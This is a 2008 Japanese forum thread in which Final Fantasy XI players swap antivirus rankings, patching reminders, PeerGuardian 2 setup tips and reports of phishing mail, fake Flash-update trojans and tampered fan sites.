191 :既にその名前は使われています:2008/08/06(水) 11:02:02 ID:8GgKuQ9S
NoScript1.7.8上げ
192 :既にその名前は使われています:2008/08/06(水) 11:22:24 ID:8JonfLUC
次世代MMORPGまだー
193 :既にその名前は使われています:2008/08/06(水) 11:35:11 ID:lu6/Cwk9
次世代MMORPGでも垢ハックはやると思うよ?
194 :既にその名前は使われています:2008/08/06(水) 12:07:56 ID:97chGcBe
検知力テスト(2008年8月5日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 94 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 158 Ikarus
4th 93% 195 BitDefender
5th 92% 223 F-Secure
6th 92% 249 AVG
7th 89% 334 Sophos
8th 89% 339 Norman
9th 89% 343 Avast
10th 87% 403 Kaspersky
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 94 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 158 Ikarus
4th 93% 195 BitDefender
5th 92% 223 F-Secure
6th 92% 249 AVG
7th 89% 334 Sophos
8th 89% 339 Norman
9th 89% 343 Avast
10th 87% 403 Kaspersky
195 :既にその名前は使われています:2008/08/06(水) 12:08:20 ID:97chGcBe
11th 85% 438 ClamAV
12th 85% 441 CAT-QuickHeal
13th 84% 494 Microsoft
14th 84% 494 VirusBuster
15th 83% 521 DrWeb
16th 80% 602 eTrust-Vet
17th 80% 607 Rising
18th 80% 608 F-Prot
19th 79% 629 Fortinet
20th 79% 642 Symantec
21st 77% 698 TheHacker
22nd 75% 769 VBA32
23rd 74% 782 AhnLab-V3
24th 74% 804 McAfee
25th 72% 842 Panda
26th 70% 915 NOD26w
12th 85% 441 CAT-QuickHeal
13th 84% 494 Microsoft
14th 84% 494 VirusBuster
15th 83% 521 DrWeb
16th 80% 602 eTrust-Vet
17th 80% 607 Rising
18th 80% 608 F-Prot
19th 79% 629 Fortinet
20th 79% 642 Symantec
21st 77% 698 TheHacker
22nd 75% 769 VBA32
23rd 74% 782 AhnLab-V3
24th 74% 804 McAfee
25th 72% 842 Panda
26th 70% 915 NOD26w
196 :既にその名前は使われています:2008/08/06(水) 12:49:23 ID:1aQKQBnC
保守
FlashplayerのVer 9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
FlashplayerのVer 9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
197 :既にその名前は使われています:2008/08/06(水) 13:10:13 ID:POrVMLNI
一番大事な
パスワードを保存するな!が抜けてるぞ
パスワードを保存するな!が抜けてるぞ
198 :既にその名前は使われています:2008/08/06(水) 14:51:35 ID:qbmYVvAc
通販サイト「ナチュラム」で約65万件の個人情報流出の可能性
http://internet.watch.impress.co.jp/cda/news/2008/08/06/20498.html
#チラシの裏
俺、そこで昨日物を発注したところなんだぜ・・・w
http://internet.watch.impress.co.jp/cda/news/2008/08/06/20498.html
#チラシの裏
俺、そこで昨日物を発注したところなんだぜ・・・w
199 :既にその名前は使われています:2008/08/06(水) 14:56:21 ID:YSfxt+/z
200 :既にその名前は使われています:2008/08/06(水) 16:41:52 ID:4dVokIGB
>>191
上げつつ情報提供ありがとう。いまupしてきた。
上げつつ情報提供ありがとう。いまupしてきた。
201 :既にその名前は使われています:2008/08/06(水) 17:52:06 ID:wWQMCGII
>>199
FAQ見てると2000年5月〜2008年7月10日の間だから昨日だと、この件はセーフ
FAQ見てると2000年5月〜2008年7月10日の間だから昨日だと、この件はセーフ
202 :既にその名前は使われています:2008/08/06(水) 17:52:15 ID:sdiKDFAO
203 :既にその名前は使われています:2008/08/06(水) 18:07:40 ID:lu6/Cwk9
は?やるとおもうよw
サゲスンチィ〜(紀元前231〜紀元後1369)です
サゲスンチィ〜(紀元前231〜紀元後1369)です
204 :既にその名前は使われています:2008/08/06(水) 19:27:13 ID:V6wLq3T3
>>203
どんな化け物だよw
どんな化け物だよw
205 :既にその名前は使われています:2008/08/06(水) 19:30:23 ID:sgByCmwX
現代のサン・ジェルマンかよwwww
206 :既にその名前は使われています:2008/08/06(水) 20:52:50 ID:q+oKzejx
上げましょう。
207 :既にその名前は使われています:2008/08/06(水) 21:14:35 ID:bufh1F48
PG2のリンク飛べないんだけど、これは違うやつです?
PeerGuardian 2 RC1 Test2-2
PeerGuardian 2 RC1 Test2-2
208 :既にその名前は使われています:2008/08/06(水) 21:45:18 ID:jq6M1t+z
>>207
>>6 の 4.参照で。
安定版は 2.0 Beta 6b ですね
日本語化されてるのは今落とせないので
お急ぎの場合 本家 http://phoenixlabs.org/pg2/ から英語版をDLする感じでいかがでしょ?
無料鯖ではじめたことを若干後悔しているFF11Warningの管理人です。
orn.jpさんの鯖が火曜深夜から落ちっぱなしで朝問い合わせメール送って返事待ちっすが
時期的に orn.jpの鯖管様が帰省とかなさってた日にはいつ復旧するか不明です。
当座必要があれば ジオにミラーあるのでご利用ください。
ttp://www.geocities.jp/ff11warning/
ご迷惑をおかけして申し訳ありません。
今回のornさんの対応次第では XREA有料に移転することも考えてます。
サブドメオプションででxrea入らないのだと cute.bzか happy.nuしかないので
(あー 独自とれってのはなしでw)ちょっと悩むところなんですけどね。
ここまで 需要があるとは思ってなくて てか だれかちゃんとしたのつくりませんか?(ぼそ
>>6 の 4.参照で。
安定版は 2.0 Beta 6b ですね
日本語化されてるのは今落とせないので
お急ぎの場合 本家 http://phoenixlabs.org/pg2/ から英語版をDLする感じでいかがでしょ?
無料鯖ではじめたことを若干後悔しているFF11Warningの管理人です。
orn.jpさんの鯖が火曜深夜から落ちっぱなしで朝問い合わせメール送って返事待ちっすが
時期的に orn.jpの鯖管様が帰省とかなさってた日にはいつ復旧するか不明です。
当座必要があれば ジオにミラーあるのでご利用ください。
ttp://www.geocities.jp/ff11warning/
ご迷惑をおかけして申し訳ありません。
今回のornさんの対応次第では XREA有料に移転することも考えてます。
サブドメオプションででxrea入らないのだと cute.bzか happy.nuしかないので
(あー 独自とれってのはなしでw)ちょっと悩むところなんですけどね。
ここまで 需要があるとは思ってなくて てか だれかちゃんとしたのつくりませんか?(ぼそ
209 :既にその名前は使われています:2008/08/06(水) 21:58:52 ID:bufh1F48
>>208
親切に有難うです。
初めての導入で日本語の方がわかりやすいかと考えていたのですが、
いつ復旧されるかもわからないので英語版DLしてみます。
FF11Warningも繋がらなかったのですが、理由があったんですねw
頑張って下さい!
親切に有難うです。
初めての導入で日本語の方がわかりやすいかと考えていたのですが、
いつ復旧されるかもわからないので英語版DLしてみます。
FF11Warningも繋がらなかったのですが、理由があったんですねw
頑張って下さい!
210 :既にその名前は使われています:2008/08/06(水) 22:11:22 ID:qXUrpr6O
WebArchive経由で日本語版落とせるけど
これでいいかな?
これでいいかな?
211 :既にその名前は使われています:2008/08/06(水) 22:15:04 ID:qXUrpr6O
PG2の日本語版
212 :既にその名前は使われています:2008/08/06(水) 22:28:56 ID:jq6M1t+z
あー 落とせますね
2008/1/20の落としてみて virustotal.に投げてみたけどだいじょぶそ。
ttp://www.virustotal.com/jp/analisis/492cc86029a51795f4c18d6e352b0803
2008/1/20の落としてみて virustotal.に投げてみたけどだいじょぶそ。
ttp://www.virustotal.com/jp/analisis/492cc86029a51795f4c18d6e352b0803
213 :既にその名前は使われています:2008/08/06(水) 22:37:12 ID:bufh1F48
214 :既にその名前は使われています:2008/08/06(水) 22:50:14 ID:eNVONrcp
215 :既にその名前は使われています:2008/08/06(水) 22:50:53 ID:YSfxt+/z
>>214
早く被害状況を確認してこい
早く被害状況を確認してこい
216 :既にその名前は使われています:2008/08/06(水) 23:07:53 ID:eNVONrcp
217 :既にその名前は使われています:2008/08/06(水) 23:16:06 ID:wuxKve7S
218 :既にその名前は使われています:2008/08/07(木) 00:21:01 ID:ofr6s+Ib
ゲームアカウントと関係あるか不明だけど
ここ数日 CNN.com Daily Top 10 というスパムが猛威を振るってます。
リンクをクリックすると flashplayerが古いよって メッセージが出てget_flash_update.exeをDLしますかってダイアログが出るらしい。
これが真っ赤な偽物でトロイらしいのでご注意ください。
実際昨日あたりから プロバイダのスパムフィルターをすり抜けて1時間に1通くらいのペースで来てます。
ここ数日 CNN.com Daily Top 10 というスパムが猛威を振るってます。
リンクをクリックすると flashplayerが古いよって メッセージが出てget_flash_update.exeをDLしますかってダイアログが出るらしい。
これが真っ赤な偽物でトロイらしいのでご注意ください。
実際昨日あたりから プロバイダのスパムフィルターをすり抜けて1時間に1通くらいのペースで来てます。
219 :既にその名前は使われています:2008/08/07(木) 00:47:37 ID:1ngviPqZ
>>218
亜種多すぎるのでなんとも言えないけどとりあえず1匹。
ttp://www.virustotal.com/analisis/7cc86acd01b4b9b5d04061e4156701f9
ネトゲトロイとは関係ないと思う。
欧米露で大量にあるインチキエロFlashのcodecを装うzlob系かと。
亜種多すぎるのでなんとも言えないけどとりあえず1匹。
ttp://www.virustotal.com/analisis/7cc86acd01b4b9b5d04061e4156701f9
ネトゲトロイとは関係ないと思う。
欧米露で大量にあるインチキエロFlashのcodecを装うzlob系かと。
220 :既にその名前は使われています:2008/08/07(木) 01:10:09 ID:1ngviPqZ
↑検知していないMcAfeeに投げたらextra.dat(臨時パターン)が投げ返された。
正式パターンへの反映待ちの模様。
# 欧米で流行している物に対しては動きはえーなぁ。
正式パターンへの反映待ちの模様。
# 欧米で流行している物に対しては動きはえーなぁ。
221 :既にその名前は使われています:2008/08/07(木) 01:15:35 ID:8k8mnkY8
POLでHTMLメール来てて中身見たらからっぽ。
???
あきらかに業者っぽいメールだった。
そういえば、非対応メールってなんかついてたな。
何だったんだろう
???
あきらかに業者っぽいメールだった。
そういえば、非対応メールってなんかついてたな。
何だったんだろう
222 :既にその名前は使われています:2008/08/07(木) 02:28:08 ID:RQY/OhBe
223 :既にその名前は使われています:2008/08/07(木) 03:16:14 ID:sj2SBKig
カスペルスキーのページが全然開けねえww
注意していたんだがやっちまったかな
注意していたんだがやっちまったかな
224 :既にその名前は使われています:2008/08/07(木) 03:24:34 ID:SPcYwG/u
225 :既にその名前は使われています:2008/08/07(木) 03:28:01 ID:sj2SBKig
>>224
キャッシュクリアしてみた。
5分ほど待ってなんとかオンラインスキャンのウィンドウを出せたが普段からこんなに重かったりするのかな?
以前使ったときはもうちと早く表示されたような気がしないでもないが
スキャン結果出たらまた来ます
キャッシュクリアしてみた。
5分ほど待ってなんとかオンラインスキャンのウィンドウを出せたが普段からこんなに重かったりするのかな?
以前使ったときはもうちと早く表示されたような気がしないでもないが
スキャン結果出たらまた来ます
226 :既にその名前は使われています:2008/08/07(木) 04:04:17 ID:sj2SBKig
重要の項目でスキャンしたがとりあえず見つからなかったから一安心。
しかしなんであんなに重かったんだろ
しかしなんであんなに重かったんだろ
227 :既にその名前は使われています:2008/08/07(木) 04:15:32 ID:TEYWRniI
無料オンラインスキャンばっかしてないでソフト買えよwww
228 :既にその名前は使われています:2008/08/07(木) 04:52:39 ID:rrhfCmPb
英語版PG2の設定は、あたりまえですけど日本語使えないから注意で
リストの説明を日本語で書いちゃうとエラーで設定したリストが飛びます
リストの説明を日本語で書いちゃうとエラーで設定したリストが飛びます
229 :既にその名前は使われています:2008/08/07(木) 05:11:24 ID:m7A5EBDl
2時間程前にHPを回っていたらPG2がガードしたので、調べたらどうもハックサイトらしくソースやら
色々と調べてみたけどよくわからず・・・分かる人居ましたらお願いします。
オタ臭くて申し訳ないけどサイトはここ。
tp://m-ex○jp/
TOPは平気なようで、ここの「サークル」って所をクリックすると666○lyzh○comの送信先IP 208○73○210○32
をブロックしたと警告が。
aguseで調べるとサーチサイト?みたいだけどやはりよく分からず。
取りあえずカスペオンラインは検出0、この後入れてあるバスター2008とAd-Awareで調べて見るつもりです。
色々と調べてみたけどよくわからず・・・分かる人居ましたらお願いします。
オタ臭くて申し訳ないけどサイトはここ。
tp://m-ex○jp/
TOPは平気なようで、ここの「サークル」って所をクリックすると666○lyzh○comの送信先IP 208○73○210○32
をブロックしたと警告が。
aguseで調べるとサーチサイト?みたいだけどやはりよく分からず。
取りあえずカスペオンラインは検出0、この後入れてあるバスター2008とAd-Awareで調べて見るつもりです。
230 :既にその名前は使われています:2008/08/07(木) 05:32:20 ID:EcVLC5Sj
>>229
aguseのカスペスキャンではウィルスは無いって出てるけど
ネットクラフトって会社が危険と判別してる。おそらく過去に
このドメインを使用してウィルス撒き散らした可能性がある。
必ずしもこのサイトとは言えないし改竄された可能性もある。
ブロックしたと出たのなら問題ないと思われるが
スキャンはしておいたほうがいいね。
aguseのカスペスキャンではウィルスは無いって出てるけど
ネットクラフトって会社が危険と判別してる。おそらく過去に
このドメインを使用してウィルス撒き散らした可能性がある。
必ずしもこのサイトとは言えないし改竄された可能性もある。
ブロックしたと出たのなら問題ないと思われるが
スキャンはしておいたほうがいいね。
231 :既にその名前は使われています:2008/08/07(木) 06:35:36 ID:9hmgW/Fz
>>230
>>aguseのカスペスキャンではウィルスは無いって出てるけど
ネットクラフトって会社が危険と判別してる。
このNetcraftってとこ、どこのブログでもCAUTIONの判定出る気がする。
よく見に行くブログがあって見る前はいつもチェックかけてるんだけど、
昨日チェックかけたら危険と判別されたよ。
気になったんで同社の他のジャンルのブログとか
他社のブログ(Seesaaとか忍者ブログとか)を複数、ジャンル問わずで無作為に選んで
チェックかけてみたけど、どれもCAUTIONの判別が出てる。
>>229の件はブログじゃないみたいだし、誤判断とは言い切れないんだけど、
これってNetcraftの判別のほうがおかしくなってる可能性はないかな?
長文失礼、あと前スレやこのスレですでに話題で出てて見逃してたら申し訳ない。
>>aguseのカスペスキャンではウィルスは無いって出てるけど
ネットクラフトって会社が危険と判別してる。
このNetcraftってとこ、どこのブログでもCAUTIONの判定出る気がする。
よく見に行くブログがあって見る前はいつもチェックかけてるんだけど、
昨日チェックかけたら危険と判別されたよ。
気になったんで同社の他のジャンルのブログとか
他社のブログ(Seesaaとか忍者ブログとか)を複数、ジャンル問わずで無作為に選んで
チェックかけてみたけど、どれもCAUTIONの判別が出てる。
>>229の件はブログじゃないみたいだし、誤判断とは言い切れないんだけど、
これってNetcraftの判別のほうがおかしくなってる可能性はないかな?
長文失礼、あと前スレやこのスレですでに話題で出てて見逃してたら申し訳ない。
232 :既にその名前は使われています:2008/08/07(木) 06:48:05 ID:EcVLC5Sj
>Netcraftの判別のほうがおかしくなってる可能性はないかな?
可能性はあるね。ただ俺が言いたかったのはブロックされた理由。
誤認識にせよ、絶対安全とは言えないからスキャンはしたほうがいいと思う。
可能性はあるね。ただ俺が言いたかったのはブロックされた理由。
誤認識にせよ、絶対安全とは言えないからスキャンはしたほうがいいと思う。
233 :既にその名前は使われています:2008/08/07(木) 06:57:36 ID:9hmgW/Fz
>>232
>>ただ俺が言いたかったのはブロックされた理由。
まずレスありがとう。
上の件なんだけど書き込みしてから「あ、ブロックされたんだっけ」と思った・・。
その事が抜けた書き込みになってしまったのは申し訳ない。
PG2がブロックしてるなら何か引っかかるものがあったんだろうね。
言われてる通り、スキャンはしたほうがいいと思うのは同意。
私自身が気になったのと、もしまだNetcraftの判別の件で出てなければ
今後何か多少の情報にでもなるかな?と思って書き込みさせてもらいました。
そろそろ家出ないといけない時間なのでこのレスで終わりにします。ありがとう。
>>ただ俺が言いたかったのはブロックされた理由。
まずレスありがとう。
上の件なんだけど書き込みしてから「あ、ブロックされたんだっけ」と思った・・。
その事が抜けた書き込みになってしまったのは申し訳ない。
PG2がブロックしてるなら何か引っかかるものがあったんだろうね。
言われてる通り、スキャンはしたほうがいいと思うのは同意。
私自身が気になったのと、もしまだNetcraftの判別の件で出てなければ
今後何か多少の情報にでもなるかな?と思って書き込みさせてもらいました。
そろそろ家出ないといけない時間なのでこのレスで終わりにします。ありがとう。
234 :既にその名前は使われています:2008/08/07(木) 08:50:07 ID:VJf5Dzg3
保守ついでに↓
FlashplayerのVer 9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワードを保存するな!
FlashplayerのVer 9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワードを保存するな!
235 :他スレからコピペ注意喚起:2008/08/07(木) 10:39:03 ID:3De8s2s1
292 名前:mixi不審メッセージ多発中 本日のレス 投稿日:2008/08/07(木) 01:09:11 ESNCoYju
前スレ落ちたから、ここで報告。
mixiにて不審メッセージ多発中。 id=16616048
誰か、踏んでくれwwww
以下コピペ
件名:はじめまして
●●●●さん
はじめまして。
三重県から上京してきました。
仕事で全国各地と世界中を旅しています。
プロフィールを見て●●●●さんのことが好きになりました。
ttp●//ameblo●jp/momomanboo/
よろしければ、マイミクお願いいたします。
前スレ落ちたから、ここで報告。
mixiにて不審メッセージ多発中。 id=16616048
誰か、踏んでくれwwww
以下コピペ
件名:はじめまして
●●●●さん
はじめまして。
三重県から上京してきました。
仕事で全国各地と世界中を旅しています。
プロフィールを見て●●●●さんのことが好きになりました。
ttp●//ameblo●jp/momomanboo/
よろしければ、マイミクお願いいたします。
236 :既にその名前は使われています:2008/08/07(木) 11:15:07 ID:1ngviPqZ
↑アカハック関係無し。
237 :既にその名前は使われています:2008/08/07(木) 11:22:46 ID:EcVLC5Sj
Linuxで見てきたが、サイトは胡散臭い記事2件になにかの講座?の宣伝だけ。
ソース内には不明のリンク2件だがどれもJPドメイン。
アカハックよりは宣伝だと思われる。
ソース内には不明のリンク2件だがどれもJPドメイン。
アカハックよりは宣伝だと思われる。
238 :既にその名前は使われています:2008/08/07(木) 11:58:59 ID:pXrtYDAA
Dr.Web1.0.18きたぞー
239 :既にその名前は使われています:2008/08/07(木) 13:53:00 ID:VJf5Dzg3
保守
FlashplayerのVer 9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワードを保存するな!
FlashplayerのVer 9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワードを保存するな!
240 :既にその名前は使われています:2008/08/07(木) 14:09:13 ID:SPcYwG/u
POL以外を全面シャットアウトしても安心出来ん
241 :既にその名前は使われています:2008/08/07(木) 14:15:42 ID:lyTQvvNI
admin●microsoft●comからIE7をDLしろって英文メールきた
MSN FEATURED OFFERSての
これフィッシング?
コレ、クリックしたらしこまれる?
と思って削除した
MSN FEATURED OFFERSての
これフィッシング?
コレ、クリックしたらしこまれる?
と思って削除した
242 :既にその名前は使われています:2008/08/07(木) 14:20:40 ID:CccsGcHM
アフォしかいねぇな
243 :既にその名前は使われています:2008/08/07(木) 14:34:09 ID:VmDm/cud
釣りだろ
244 :既にその名前は使われています:2008/08/07(木) 14:34:24 ID:z7FdMK4Z
ティルテュのFF11日記ってところ見たら、画面になにも出なくて
aguseしてみたら、フィッシングサイトの注意が出た。なんなの、どうなるの?
aguseしてみたら、フィッシングサイトの注意が出た。なんなの、どうなるの?
245 :既にその名前は使われています:2008/08/07(木) 14:35:28 ID:EcVLC5Sj
>>240
論理的にPCが■以外のIPアドレスに接続できない状態なら安全なはずだが、
すでに何かのプログラムが入り込んでいて、ルーターを直接ハックされたり、
プロキシの設定を変更されてハック先に串さすような設定されていると
垢ハックされる。もちろんIPフィルタに細工される可能性もある。
>>241
表示されるメールアドレスと実際の送ってきたメールアドレスが違う場合がある。
面識のない人から送られてきたリンクやアタッチメントは絶対にあけないように。
もちろん知り合いのふりをしたウィルスメールもくるので面識があっても疑ってかかるように。
論理的にPCが■以外のIPアドレスに接続できない状態なら安全なはずだが、
すでに何かのプログラムが入り込んでいて、ルーターを直接ハックされたり、
プロキシの設定を変更されてハック先に串さすような設定されていると
垢ハックされる。もちろんIPフィルタに細工される可能性もある。
>>241
表示されるメールアドレスと実際の送ってきたメールアドレスが違う場合がある。
面識のない人から送られてきたリンクやアタッチメントは絶対にあけないように。
もちろん知り合いのふりをしたウィルスメールもくるので面識があっても疑ってかかるように。
246 :既にその名前は使われています:2008/08/07(木) 14:36:53 ID:WDakFldd
>>244
可及的速やかにカスペかどっかでスキャンしる。
あと、パスをHDDに保存していないのなら慌てて変更する必要は一応無い
感染した状態で「罠サイト見た!パスかえなきゃ!」とやると通信時に逆に抜かれてしまうからね。
可及的速やかにカスペかどっかでスキャンしる。
あと、パスをHDDに保存していないのなら慌てて変更する必要は一応無い
感染した状態で「罠サイト見た!パスかえなきゃ!」とやると通信時に逆に抜かれてしまうからね。
247 :既にその名前は使われています:2008/08/07(木) 14:42:41 ID:EcVLC5Sj
>>244
fc2だから改竄されてて、その時ブラックリストに追加されたかなんかだろ。
Linuxで見たが普通にでてくるし、aguseでもNetcraft以外は安全と出とる。
もちろんNoScriptとIFrame設定はきちんとしてるよな?
fc2だから改竄されてて、その時ブラックリストに追加されたかなんかだろ。
Linuxで見たが普通にでてくるし、aguseでもNetcraft以外は安全と出とる。
もちろんNoScriptとIFrame設定はきちんとしてるよな?
248 :既にその名前は使われています:2008/08/07(木) 14:46:59 ID:hKMtiLz1
249 :既にその名前は使われています:2008/08/07(木) 14:48:19 ID:WDakFldd
250 :既にその名前は使われています:2008/08/07(木) 15:46:28 ID:kbx1ksvQ
未対応とかいう表示のメールがPOLにきた
>>221のやつかな〜
>>221のやつかな〜
251 :既にその名前は使われています:2008/08/07(木) 16:00:53 ID:lyTQvvNI
>>245
ありがとうございます
ありがとうございます
252 :既にその名前は使われています:2008/08/07(木) 17:32:50 ID:VmDm/cud
メールパスとっくに分からなくなってるから安全^^v
253 :既にその名前は使われています:2008/08/07(木) 17:56:40 ID:z5fo8iWR
1から復帰を考えてるけど、どのサイトが今のところ安全なのかわからないからしり込み(´・ω・`)
254 :既にその名前は使われています:2008/08/07(木) 17:59:09 ID:RaR4ck2H
絶対安全!てのはありえないに近いからなwうかつに教えられんw
255 :既にその名前は使われています:2008/08/07(木) 19:17:27 ID:sx02QNNf
NoScript 1.7.8来てたage
256 :既にその名前は使われています:2008/08/07(木) 19:22:33 ID:h6nWJTzQ
うんこおおおお
257 :既にその名前は使われています:2008/08/07(木) 19:23:01 ID:UD8KxMEc
258 :既にその名前は使われています:2008/08/07(木) 20:22:01 ID:VaWgYlwZ
>>241
うちにもそのメールきた。
怪しげだったので、プロパティで差出人を見たら自己アドレス、更に返送時(?)のアドレスが知らないアドレス宛が表示されてて
気持ち悪かったから、問答無用で削除した。
中を開かず、そのままプロパティから詳細・ソースみる限り何か書いてリンクはってた感じたったなー。
それ以前に、自分のはすでにIE7だから不要のものだ。
うちにもそのメールきた。
怪しげだったので、プロパティで差出人を見たら自己アドレス、更に返送時(?)のアドレスが知らないアドレス宛が表示されてて
気持ち悪かったから、問答無用で削除した。
中を開かず、そのままプロパティから詳細・ソースみる限り何か書いてリンクはってた感じたったなー。
それ以前に、自分のはすでにIE7だから不要のものだ。
259 :既にその名前は使われています:2008/08/07(木) 20:42:56 ID:5ts1o4Yx
Itmedia:国内で1万ページに被害か:Webサイト改ざん被害が急増、7月の国内ウイルスリポート
ttp://www.itmedia.co.jp/enterprise/articles/0808/05/news056.html
>トレンドマイクロは8月5日、国内を対象とした7月の「インターネット脅威マンスリーレポート」を発表した。
>7月の不正プログラム感染報告数は、前月比2136件増の6368件となった。
>報告数のトップは、オンラインゲーム関連情報の盗難を目的とした「TROJ_CABAT」の163件で、
>同種のほかオンラインゲームの情報を標的するウイルスがトップ10の半数を占めた。
>同社では、7月17日にSQLインジェクション攻撃によってWebサイト改ざん被害が拡大していると警告。
>世界全体で最大21万ページ、国内で約1万ページが「TROJ_ASPROX」によって改ざんされた疑いがあるという。
ttp://www.itmedia.co.jp/enterprise/articles/0808/05/news056.html
>トレンドマイクロは8月5日、国内を対象とした7月の「インターネット脅威マンスリーレポート」を発表した。
>7月の不正プログラム感染報告数は、前月比2136件増の6368件となった。
>報告数のトップは、オンラインゲーム関連情報の盗難を目的とした「TROJ_CABAT」の163件で、
>同種のほかオンラインゲームの情報を標的するウイルスがトップ10の半数を占めた。
>同社では、7月17日にSQLインジェクション攻撃によってWebサイト改ざん被害が拡大していると警告。
>世界全体で最大21万ページ、国内で約1万ページが「TROJ_ASPROX」によって改ざんされた疑いがあるという。
260 :既にその名前は使われています:2008/08/07(木) 20:53:22 ID:UJccFlxz
不正アクセス専用チャットサポート、8月11日(月)を臨時休業。
社会人がようやっと夏休みに入る途端にこの仕打ちwww
次は盆休みもありそうだなw
社会人がようやっと夏休みに入る途端にこの仕打ちwww
次は盆休みもありそうだなw
261 :既にその名前は使われています:2008/08/07(木) 20:54:09 ID:WDakFldd
262 :既にその名前は使われています:2008/08/07(木) 20:54:49 ID:1ngviPqZ
チャットサポートする人も社会人でようやっと夏休みなんですよ^^;
263 :既にその名前は使われています:2008/08/07(木) 21:08:26 ID:UJccFlxz
■e<お盆休みは12〜15日です^^
264 :既にその名前は使われています:2008/08/07(木) 22:58:21 ID:O/LSvF5z
詩人テンプレが改竄されていた模様。警告age
【吟遊詩人】♪やっと来た新アビ♪【第九十五楽章】
http://yy28.kakiko.com/test/read.cgi/ff11jobjobplus/1212050393/793
【吟遊詩人】♪やっと来た新アビ♪【第九十五楽章】
http://yy28.kakiko.com/test/read.cgi/ff11jobjobplus/1212050393/793
265 :既にその名前は使われています:2008/08/07(木) 22:58:27 ID:EAinJDW/
社会人のひとさ〜質問〜
夏休みって4日くらい?ないとか?
夏休みって4日くらい?ないとか?
266 :既にその名前は使われています:2008/08/07(木) 23:03:13 ID:EAinJDW/
ひきこもりしかいないかな?
スクエニに休みはいつですかって聞いたら答えられませんって言われたから
休みないのかと思ったけどそうじゃないみたいね
スクエニに休みはいつですかって聞いたら答えられませんって言われたから
休みないのかと思ったけどそうじゃないみたいね
267 :既にその名前は使われています:2008/08/07(木) 23:04:09 ID:WDakFldd
268 :既にその名前は使われています:2008/08/07(木) 23:11:03 ID:EAinJDW/
269 :既にその名前は使われています:2008/08/07(木) 23:31:41 ID:5wy+2SUL
>>268
3日しか出ないところとかもあるぞ。
3日しか出ないところとかもあるぞ。
270 :既にその名前は使われています:2008/08/07(木) 23:35:56 ID:m7A5EBDl
>>230>>233
レス有難うございます。
その後、バスターとAd-Awareでもチェックした所どちらも検出はされませんでした。
Netcraftについてはいくつか回ってみましたが、うちでもやはり問題無さそうな所でも
CAUTIONの出る確率が高いですね〜
あとは、やはりブロックされた理由が分からないのがちょっと気になりますねorz
一応大丈夫そうですが、まだ分からないので気を抜かず注意しようと思います。
レス有難うございます。
その後、バスターとAd-Awareでもチェックした所どちらも検出はされませんでした。
Netcraftについてはいくつか回ってみましたが、うちでもやはり問題無さそうな所でも
CAUTIONの出る確率が高いですね〜
あとは、やはりブロックされた理由が分からないのがちょっと気になりますねorz
一応大丈夫そうですが、まだ分からないので気を抜かず注意しようと思います。
271 :既にその名前は使われています:2008/08/07(木) 23:50:50 ID:5ts1o4Yx
272 :既にその名前は使われています:2008/08/08(金) 00:08:40 ID:u810Uygh
>>208 ttp://miku.a.orn.jp/miku2/続報 私用でスレを使い申し訳ありません。
落雷が原因かと思ってましたがorn.jp様がトラフィックオーバーでプロバから利用停止されちゃったようです。
鯖管様のブログ ttp://d.hatena.ne.jp/orn/
安定復旧の見通しが暗そうなので ジオのミラーは.htaccessが使えないのでミラーのままとして
メインサイトを 広告免除のXREA+ http://miku.xrea.jp/ に移すことにしました。
それに伴いタイトルを FF11アカハクから FF11WARNINGにしました。
ttp://miku.a.orn.jp/のアカウントはは 悪用されないように利用停止しないで残しますので
復帰するようなら ttp://miku.a.orn.jp/からもリンクは張りますが
もしお手数でなければ 飛び先確認後 スレ内からリンクを踏んでいただけると
検索エンジンでのヒットが早くなると思います。
勢いでこのスレのテンプレっぽいのもうp http://miku.xrea.jp/template
CGI部分に関しては 徐々に移設予定です。デスマ中に付き簡単で申し訳ないですがご報告まで。
落雷が原因かと思ってましたがorn.jp様がトラフィックオーバーでプロバから利用停止されちゃったようです。
鯖管様のブログ ttp://d.hatena.ne.jp/orn/
安定復旧の見通しが暗そうなので ジオのミラーは.htaccessが使えないのでミラーのままとして
メインサイトを 広告免除のXREA+ http://miku.xrea.jp/ に移すことにしました。
それに伴いタイトルを FF11アカハクから FF11WARNINGにしました。
ttp://miku.a.orn.jp/のアカウントはは 悪用されないように利用停止しないで残しますので
復帰するようなら ttp://miku.a.orn.jp/からもリンクは張りますが
もしお手数でなければ 飛び先確認後 スレ内からリンクを踏んでいただけると
検索エンジンでのヒットが早くなると思います。
勢いでこのスレのテンプレっぽいのもうp http://miku.xrea.jp/template
CGI部分に関しては 徐々に移設予定です。デスマ中に付き簡単で申し訳ないですがご報告まで。
273 :既にその名前は使われています:2008/08/08(金) 00:11:46 ID:cL25FzLo
274 :既にその名前は使われています:2008/08/08(金) 00:18:39 ID:To5BkrnS
FFHOOKて、改斬とか言うツールのdllだっけ?
275 :既にその名前は使われています:2008/08/08(金) 00:29:39 ID:dVfI4H/P
そう
276 :既にその名前は使われています:2008/08/08(金) 00:46:23 ID:To5BkrnS
FFもしてないインターネット用PCからこいつが出てきたんだが
なぜか、サイトアドバイザーの中に「FF」というフォルダーがあるんだ
なぜか、サイトアドバイザーの中に「FF」というフォルダーがあるんだ
277 :既にその名前は使われています:2008/08/08(金) 00:46:38 ID:9IhBSvS/
そのファイルはやばいんでは…
278 :既にその名前は使われています:2008/08/08(金) 00:49:28 ID:EJkan9mG
つか詩人テンプレサイト改竄の件いろんな意味でヤバくないかい
サイトの中身そのものがいじられて罠スクリプトしこまれたんだろ?
外部呼び出しの広告に仕込まれたAHだのXREAだのの時と訳が違うぞ・・・
サイトの中身そのものがいじられて罠スクリプトしこまれたんだろ?
外部呼び出しの広告に仕込まれたAHだのXREAだのの時と訳が違うぞ・・・
